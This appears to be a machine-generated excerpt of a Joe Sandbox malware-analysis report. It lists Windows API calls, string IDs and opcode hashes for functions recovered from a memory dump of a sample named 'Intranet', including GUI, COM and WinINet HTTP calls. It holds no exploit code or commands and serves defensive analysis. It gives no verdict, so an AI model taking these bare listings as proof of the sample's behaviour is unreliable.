                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 129472671-2362178303
                                                                            • Opcode ID: 721f5704db529df8564faa69eec9c759c320cf4eb8c132f1910a16a341687c04
                                                                            • Instruction ID: d43808d76b510308edb0af9add76dbcc5095c7497d4b71a5ac06cc74e91f9a0c
                                                                            • Opcode Fuzzy Hash: 721f5704db529df8564faa69eec9c759c320cf4eb8c132f1910a16a341687c04
                                                                            • Instruction Fuzzy Hash: F641D471208209AADB555F289C59BFB3695FBE8304F00051BF501933D3DAB9DC15A77A
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0050BB13
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0050BB89
                                                                            • GetLastError.KERNEL32 ref: 0050BB93
                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0050BC00
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: c3537630a2e56a6c73830f6f080b483ad8cb441ff77bb602c5bf11e6574e2bf5
                                                                            • Instruction ID: 9b89fc1e5da549114238f3217dc5d9a0f0eefd5d7f1393e26bc664a809a55e6d
                                                                            • Opcode Fuzzy Hash: c3537630a2e56a6c73830f6f080b483ad8cb441ff77bb602c5bf11e6574e2bf5
                                                                            • Instruction Fuzzy Hash: 7431AF35A00209AFEB10EF69C8A9EAEBFB4FF44304F14806AF805972D5DB759905CB90
                                                                            APIs
                                                                            • LoadIconW.USER32(00000000,00007F03,00567A2C,00567890,00567A30,00567890,00567890,?,004F0D1F,?,?,00567A30), ref: 0050357C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoad
                                                                            • String ID: ,zV0zV$,zV0zV$blank$info$question$stop$warning
                                                                            • API String ID: 2457776203-2417278009
                                                                            • Opcode ID: addd8b32d9b28d990c27b1c6beb3172f51c6b114f089b9f69991c69571bf801c
                                                                            • Instruction ID: fd53440bf34c55439ec12b7d91840d919d97d55d8bc95861d55e74c5c03e3568
                                                                            • Opcode Fuzzy Hash: addd8b32d9b28d990c27b1c6beb3172f51c6b114f089b9f69991c69571bf801c
                                                                            • Instruction Fuzzy Hash: 08110575608B06BEEB009E15EC92D7E7F9CFF05365F20002FFA00A62D1EB696F4056A4
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004FB79A: GetClassNameW.USER32(?,?,000000FF), ref: 004FB7BD
                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 004F9BCC
                                                                            • GetDlgCtrlID.USER32(?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 004F9BD7
                                                                            • GetParent.USER32(?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 004F9BF3
                                                                            • SendMessageW.USER32(00000000,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 004F9BF6
                                                                            • GetDlgCtrlID.USER32(?,?,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?), ref: 004F9BFF
                                                                            • GetParent.USER32(?,00000111,?,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?), ref: 004F9C1B
                                                                            • SendMessageW.USER32(00000000,?,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?), ref: 004F9C1E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: fa425b7871eaf0ee6cd1d10f6ce1246539edf7d7bdbdc4fae75f9d97b3f52ab2
                                                                            • Instruction ID: 7a841dfb87ee380b88dc32939f88d98a09704e79d5a42fbb6070df369fa75180
                                                                            • Opcode Fuzzy Hash: fa425b7871eaf0ee6cd1d10f6ce1246539edf7d7bdbdc4fae75f9d97b3f52ab2
                                                                            • Instruction Fuzzy Hash: 8521D670900208BFCF05EB61CCA5EFEBBB5EF95310F10011AF961932E5DB7859199B24
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004FB79A: GetClassNameW.USER32(?,?,000000FF), ref: 004FB7BD
                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F9CB5
                                                                            • GetDlgCtrlID.USER32(?,?,?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F9CC0
                                                                            • GetParent.USER32(?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F9CDC
                                                                            • SendMessageW.USER32(00000000,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F9CDF
                                                                            • GetDlgCtrlID.USER32(?,?,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?), ref: 004F9CE8
                                                                            • GetParent.USER32(?,00000111,?,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?), ref: 004F9D04
                                                                            • SendMessageW.USER32(00000000,?,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?), ref: 004F9D07
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: cb12e6a82beb48bb0749f9c67d76feeef68adbea0e8c83d1bcdde3aba6b4304b
                                                                            • Instruction ID: eb79f1872aa7b7cd568dbbe7ee85a9cc4db795fb444b7b8e0081fb9be799e9a5
                                                                            • Opcode Fuzzy Hash: cb12e6a82beb48bb0749f9c67d76feeef68adbea0e8c83d1bcdde3aba6b4304b
                                                                            • Instruction Fuzzy Hash: CE21F571900208BFDF11AB61CCA5EFEBBB9EF95300F100116F951932A5DB795919DB24
                                                                            APIs
                                                                            • GetParent.USER32 ref: 004F9D27
                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 004F9D3C
                                                                            • _wcscmp.LIBCMT ref: 004F9D4E
                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004F9DC9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                            • API String ID: 1704125052-3381328864
                                                                            • Opcode ID: ed011c4eab07231fd85ae1626e908f21fba31ac8858781ee2f4a1d38a2daa73a
                                                                            • Instruction ID: 0d9b8b644d32ec62fc4aeae842e5808a843fac2f31a1d9ca4cd4be0f31afa959
                                                                            • Opcode Fuzzy Hash: ed011c4eab07231fd85ae1626e908f21fba31ac8858781ee2f4a1d38a2daa73a
                                                                            • Instruction Fuzzy Hash: 9C110A7A24830ABEFA112621EC17FB7779CDB15326B30011BFF00A41D1FE5E6E155959
                                                                            APIs
                                                                            • #8.OLEAUT32(?), ref: 00518FC1
                                                                            • CoInitialize.OLE32(00000000,00530980), ref: 00518FEE
                                                                            • CoUninitialize.OLE32 ref: 00518FF8
                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 005190F8
                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00519225
                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00533BDC), ref: 00519259
                                                                            • CoGetObject.OLE32(?,00000000,00533BDC,?), ref: 0051927C
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 0051928F
                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0051930F
                                                                            • #9.WSOCK32(?), ref: 0051931F
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$Object$FileFromInitializeInstanceRunningTableUninitialize
                                                                            • String ID:
                                                                            • API String ID: 3414436084-0
                                                                            • Opcode ID: 23a7def1276adf631a2959414028224fbb0599316de859e938edd9fccc4bfc5b
                                                                            • Instruction ID: 9c0a3fb1a10144e06adde94c269ca9504700a47fdff820b9e3d79a62a9df1ef0
                                                                            • Opcode Fuzzy Hash: 23a7def1276adf631a2959414028224fbb0599316de859e938edd9fccc4bfc5b
                                                                            • Instruction Fuzzy Hash: A4C14571608305AFE700DF65C8949ABBBE9FF89308F00491DF98A9B251DB71ED85CB52
                                                                            APIs
                                                                            • #77.OLEAUT32(00000000,?,00000002,?,00000000,00000000,?,?,?,?,?,00507B47,?,?,?,?), ref: 00508027
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7894d1b402a66a7771e1843dae1b8fe9edaed08a2a7f5263a67a34e336367ccd
                                                                            • Instruction ID: ccea10cf078f13d78af932031a32efe993659f7e56e7fa08490c8d173ff0f013
                                                                            • Opcode Fuzzy Hash: 7894d1b402a66a7771e1843dae1b8fe9edaed08a2a7f5263a67a34e336367ccd
                                                                            • Instruction Fuzzy Hash: 3DB1AE75E0421A9FDB00DF94D885FBEBBB4FF49321F144429E690E7291DB74A941CBA0
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008,00000000), ref: 004A260D
                                                                            • SetTextColor.GDI32(?,000000FF,00000000), ref: 004A2617
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004A262C
                                                                            • GetStockObject.GDI32(00000005), ref: 004A2634
                                                                            • GetClientRect.USER32(?), ref: 004DC0FC
                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 004DC113
                                                                            • GetWindowDC.USER32(?), ref: 004DC11F
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 004DC12E
                                                                            • ReleaseDC.USER32(?,00000000), ref: 004DC140
                                                                            • GetSysColor.USER32(00000005), ref: 004DC15E
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 3430376129-0
                                                                            • Opcode ID: 46ab3337bca368a0b271404327b137010d3007d37a6b9a774d28742ca7161367
                                                                            • Instruction ID: 818acbcfe18cf0935588ee47dde19ce67427344f1d8d8b07e6dea3b35a26bac2
                                                                            • Opcode Fuzzy Hash: 46ab3337bca368a0b271404327b137010d3007d37a6b9a774d28742ca7161367
                                                                            • Instruction Fuzzy Hash: 3011A931500305BFDB215FA8EC58BAA7BB6FB28321F100262FA26952E1CB710955FF10
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004AADE1
                                                                            • OleUninitialize.OLE32(?,00000000), ref: 004AAE80
                                                                            • UnregisterHotKey.USER32(?), ref: 004AAFD7
                                                                            • DestroyWindow.USER32(?), ref: 004E2F64
                                                                            • FreeLibrary.KERNEL32(?), ref: 004E2FC9
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004E2FF6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 469580280-3243417748
                                                                            • Opcode ID: d460e86e12d26774d18ff436dae532a87db8839e2666e366b919a1d927847d7e
                                                                            • Instruction ID: cc59ea00cf839843c1f3925119614d6f50eff41bceaed8193d51caba786f3d54
                                                                            • Opcode Fuzzy Hash: d460e86e12d26774d18ff436dae532a87db8839e2666e366b919a1d927847d7e
                                                                            • Instruction Fuzzy Hash: 41A18034701212CFCB29EF15C598E6AF764BF15705F1042AEE80AAB351CB39AD16CF99
                                                                            APIs
                                                                            • EnumChildWindows.USER32(?,004FB13A), ref: 004FB078
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ChildEnumWindows
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 3555792229-1603158881
                                                                            • Opcode ID: b8bcc91f0b266a95804c4a46b738881db75aab576a8166b7fbe3bfcbb5e42b31
                                                                            • Instruction ID: a6443f96ea9ad9334e946eecadc6ff573c86ecfc794e2783e7080ea4f75373d2
                                                                            • Opcode Fuzzy Hash: b8bcc91f0b266a95804c4a46b738881db75aab576a8166b7fbe3bfcbb5e42b31
                                                                            • Instruction Fuzzy Hash: C291A2B0A00109EACB48EF61C491BFAFB75FF04304F50811FEA5AA7251DF386959C7A9
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 004A327E
                                                                              • Part of subcall function 004A218F: GetClientRect.USER32(?,?), ref: 004A21B8
                                                                              • Part of subcall function 004A218F: GetWindowRect.USER32(?,?), ref: 004A21F9
                                                                              • Part of subcall function 004A218F: ScreenToClient.USER32(?,?), ref: 004A2221
                                                                            • GetDC.USER32 ref: 004DD073
                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004DD086
                                                                            • SelectObject.GDI32(00000000,00000000,?,00000031,00000000,00000000), ref: 004DD094
                                                                            • SelectObject.GDI32(00000000,00000000,?,00000031,00000000,00000000), ref: 004DD0A9
                                                                            • ReleaseDC.USER32(?,00000000,?,00000031,00000000,00000000), ref: 004DD0B1
                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004DD13C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                            • String ID: U
                                                                            • API String ID: 4009187628-3372436214
                                                                            • Opcode ID: 458ed083077039d88c52a9db56157c0db5901cc4f463899e5775f32bceda1163
                                                                            • Instruction ID: 6e62eca5f154800410e27337bb063f883ab1e4afb78a8782ad759a5e3f284b90
                                                                            • Opcode Fuzzy Hash: 458ed083077039d88c52a9db56157c0db5901cc4f463899e5775f32bceda1163
                                                                            • Instruction Fuzzy Hash: 3C711331800205DFCF218F64C894AAA7BB5FF9A314F1442ABFD515A3A6D7398C42DB54
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                              • Part of subcall function 004A2714: GetCursorPos.USER32(?,?,005677B0,?,005677B0,005677B0,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?), ref: 004A2727
                                                                              • Part of subcall function 004A2714: ScreenToClient.USER32(005677B0,?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001), ref: 004A2744
                                                                              • Part of subcall function 004A2714: GetAsyncKeyState.USER32(?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001,?), ref: 004A2769
                                                                              • Part of subcall function 004A2714: GetAsyncKeyState.USER32(?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001,?), ref: 004A2777
                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0052C69C
                                                                            • ImageList_EndDrag.COMCTL32 ref: 0052C6A2
                                                                            • ReleaseCapture.USER32 ref: 0052C6A8
                                                                            • SetWindowTextW.USER32(?,00000000,?,?,00000000,?,00000000), ref: 0052C752
                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0052C765
                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0052C847
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                            • API String ID: 1924731296-2107944366
                                                                            • Opcode ID: 0fd1564a29288499881ffcc306d8dcbabebcc038584447b9edb60e578ad70049
                                                                            • Instruction ID: 3c44edc2339d214f906df6d7227f22d84e4cf36d6d48b2946643748964aeeb28
                                                                            • Opcode Fuzzy Hash: 0fd1564a29288499881ffcc306d8dcbabebcc038584447b9edb60e578ad70049
                                                                            • Instruction Fuzzy Hash: E4518870204305AFDB04EF24D85AF6A7BE1FF99318F00851EF555872E2DB70A948DB56
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0051211C
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?), ref: 00512148
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0051218A
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004,?,?,?,?,?,?,?,?,?), ref: 0051219F
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 005121AC
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 005121DC
                                                                            • InternetCloseHandle.WININET(00000000,0000000D,DEADBEEF,00000000,?,?,?,?,?,?,?,?,?), ref: 00512223
                                                                              • Part of subcall function 00512B4F: GetLastError.KERNEL32(?,?,00511EE3,00000000,00000000,00000001), ref: 00512B64
